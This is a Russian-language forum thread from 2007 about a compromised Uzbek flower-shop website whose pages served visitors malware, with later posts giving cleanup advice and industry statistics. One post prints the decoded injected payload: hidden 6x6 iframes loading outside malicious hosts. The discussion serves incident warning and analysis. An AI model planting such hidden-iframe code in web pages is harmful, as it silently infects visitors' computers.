Моё меню Общее меню Сообщество Правила форума Все прочитано
Вернуться   uForum.uz > ИКТ и телеком > Информационная безопасность > Инциденты
Сообщения за день Поиск
Знаете ли Вы, что ...
...инструкция по установке аватара описана в Правилах форума.
<< Предыдущий совет - Случайный совет - Следующий совет >>

Инциденты Обсуждение произошедших инцидентов информационной безопасности


Ответить

 
Опции темы Опции просмотра
Старый 21.09.2007 11:36   #1  
Open ID GroupG.Woo
Аватар для Ilya V. Dolgushin
Оффлайн
Студия дизайна Strogo.net
Арт-директор
AKA:G.Woo
Сообщений: 5,707
+ 2,025  1,181/774
– 0  0/0

UzbekistanОтправить сообщение для Ilya V. Dolgushin с помощью ICQОтправить сообщение для Ilya V. Dolgushin с помощью Skype™LiveJournal
Exclamation FromUz - атака на эмигрантов!

Сам я не решился пройти по ссылке на FromUz`е, но вот что пишут пользователи этого форума:
Цитата:
Всем приветик!
Видели наверху призыв "найдем и поздравим наших учителей"? Что-то идея мне понравилась, хотела залезть по ссылке, узнать больше, а там как поперли вирусыыыы! Еле убежала................
http://www.fromuz.com/forum/index.ph...post&p=1565616

Так что будьте осторожны...
Ответить 
Старый 21.09.2007 13:52   #2  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
Спасибо за информацию. На самом деле с FromUz ничего не произошло. Угрозу представляет веб-сайт hттp://www.FlowerShop.uz, на который ссылается рекламная ссылка "найдем и поздравим наших учителей" размещенная на FromUz.

При открытии веб-сайта hттp://www.FlowerShop.uz срабатывает вредоносная ссылка размещенная в index файле между тегами
<!-- start get_javascript вредоносная ссылка <!-- end get_javascript(applicationtop2header) //-->

После раскодирования зашифрованного текста, получаем следующую ссылку - hттp://977398530/?2954196ea44dc2a0

Веб-сайт, расположенный по данной ссылке содержит следующий вредоносный код:

Код:
<iframe src='http://malasha.com' width='6' height='6' style='visibility: hidden;'></iframe>
<iframe src='http://977398531/s' width='6' height='6' style='visibility: hidden;'></iframe>
После чего, на компьютер пользователя пытается установиться вредоносное ПО. Будьте бдительны. Администрации веб-сайта hттp://www.FlowerShop.uz будет сообщено об инциденте.

Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 16:30.
Ответить 
Старый 21.09.2007 16:35   #3  
Known ID Group
Аватар для netklon
Оффлайн
eSector Solutions
Интерфейс-самурай, Девелопмент-генерал
Сообщений: 2,774
+ 788  1,915/912
– 24  61/32

UzbekistanLiveJournalМой Круг
Спасибо за информацию.

Наша компания (eSector Solutions) занимается поддержкой сайта flowershop.uz. Внедренный javascript-код был нами удален.
Ответить 
"+" от:
Старый 21.09.2007 16:47   #4  
Аватар для Eldar Ishimbaev
Оффлайн
Сообщений: 4,884
+ 433  2,393/1,396
– 12  37/21

Uzbekistan
Цитата:
Сообщение от netklon Посмотреть сообщение
Наша компания (eSector Solutions) занимается поддержкой сайта flowershop.uz. Внедренный javascript-код был нами удален.
К сожалению простое удаление может оказаться неэффективным. Сканирование рабочих станций на вредоносное ПО, смена паролей и пр. Бот, записывающий код в исходники может работать циклично. Наверное, подробно Вам описывать не нужно.
Ответить 
Старый 21.09.2007 20:29   #5  
Real ID Group Ultimate uParty Member ЕС
Аватар для Evgeniy Sklyarevskiy
Оффлайн
UZINFOCOM
Сотрудник ZiyoNET
AKA:ЕС, barbaris, arbuz
Сообщений: 32,709
+ 10,568  16,236/8,377
– 50  472/298

UzbekistanLiveJournalАккаунт на TwitterFacebook
Хотелось бы узнать - это массовая атака на Узнет или просто раньше не обращали внимания на это?
И что делает вирус на зараженном компьютере?
Ответить 
Старый 22.09.2007 12:03   #6  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
Цитата:
Сообщение от Evgeniy Sklyarevskiy Посмотреть сообщение
Хотелось бы узнать - это массовая атака на Узнет или просто раньше не обращали внимания на это?
И что делает вирус на зараженном компьютере?
Массовой атаки на узнет замечено не было. На сегодняшний день по статистике различных экспертов по информационной безопасности во всем мире на первых местах стоит как раз угроза внедрения вредоносного кода на веб-сайты. В основном это делается для того, чтобы воровать идентификационные данные пользователей и вовлекать их компьютеры в различные бот-сети. Данный вид угрозы широко распространен практически во всех странах. Узбекистан не исключение. Если в прошлом году мы могли наблюдать единичные случаи внедрения вредоносного кода на сайты, то в этом году это уже становится действительно серьезной проблемой.
Ответить 
Старый 22.09.2007 12:39   #7  
Аватар для Eldar Ishimbaev
Оффлайн
Сообщений: 4,884
+ 433  2,393/1,396
– 12  37/21

Uzbekistan
Цитата:
Сообщение от Dmitry Paleev Посмотреть сообщение
Массовой атаки на узнет замечено не было.
Дима, я думаю можно опубликовать в цифрах сколько всего найдено инфицированных сайтов в сети Интернет.
Ответить 
Реклама и уведомления
Старый 22.09.2007 12:53   #8  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
Информация по теме ...

Примерно один из десяти веб-сайтов, проиндексированных крупнейшей поисковой системой Google, содержит троянский код, способный заразить компьютер посетителя. К такому выводу пришел исследователь Google Нильс Провос, проведший с коллегами анализ 4,5 миллиона веб-страниц.

На 450 тысячах сайтах был обнаружен код, загружающий различные вредоносные или шпионские программы. Еще на 700 тысячах исследователи обнаружили код, который потенциально может нарушить безопасность системы. "Для того чтобы заставить пользователя установить вредоносный код, используется социальная инженерия, - пишет Нильс Провос в докладе "Призрак в браузере". - Пользователю предоставляются ссылки, на которых обещают "интересные" страницы с откровенным порнографическим контентом, пиратским ПО или музыкой и видео. Типичный пример таких сайтов - галерея уменьшенных изображений со ссылками якобы на взрослые видеоклипы".

Вредоносный код нередко попадает и на легальные веб-страницы. Исследователи обнаружили его в баннерах и виджетах. С развитием Web 2.0 и сайтов с контентом, составленным самими пользователями, проникновение на компьютеры через веб-страницы становится новым привлекательным вектором атаки.

Еще один способ - взлом легальных веб-сайтов и внедрение в страницы вредоносного кода. Посещая доверенный сайт, пользователь может не обращать внимания на предупреждения об опасности или понизить уровень защиты заранее. В ходе исследования авторы доклада заразили свои компьютеры 50 различными видами вредоносного кода, посещая легальные веб-страницы, "угнанные" хакерами.
Ответить 
"+" от:
Старый 22.09.2007 13:00   #9  
Аватар для Dmitry Paleev
Оффлайн
Сообщений: 967
+ 184  236/143
– 1  1/1

Uzbekistan
Пугающая статистика: каждый день появляется более 30 тысяч вредоносных сайтов

В отчете компании Sophos говорится, что на сегодняшний день в Сети появляется около 30 тысяч новых вредоносных веб-сайтов, вместо 5000 в день в апреле, т.е. можно сказать, их количество увеличивается в геометрической прогрессии. Столь устрашающую тенденцию Sophos объясняет двумя причинами.

Хакеры все чаще переключаются с e-mail в качестве предпочтительного метода распространения вредоносного ПО на веб-сайты, причем чаще всего взламывают легитимные сайты и помещают на них вредоносное ПО. 80% — это взломанные легитимные сайты. Другая причина столь резкого скачка числа вредоносных сайтов - их просто стали лучше искать...
Ответить 
"+" от:
Ответить




Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot
Advertisement System V2.5 By Branden
OOO «Единый интегратор UZINFOCOM»


Новые 24 часа Кто на форуме Новички Поиск Кабинет Все прочитано Вверх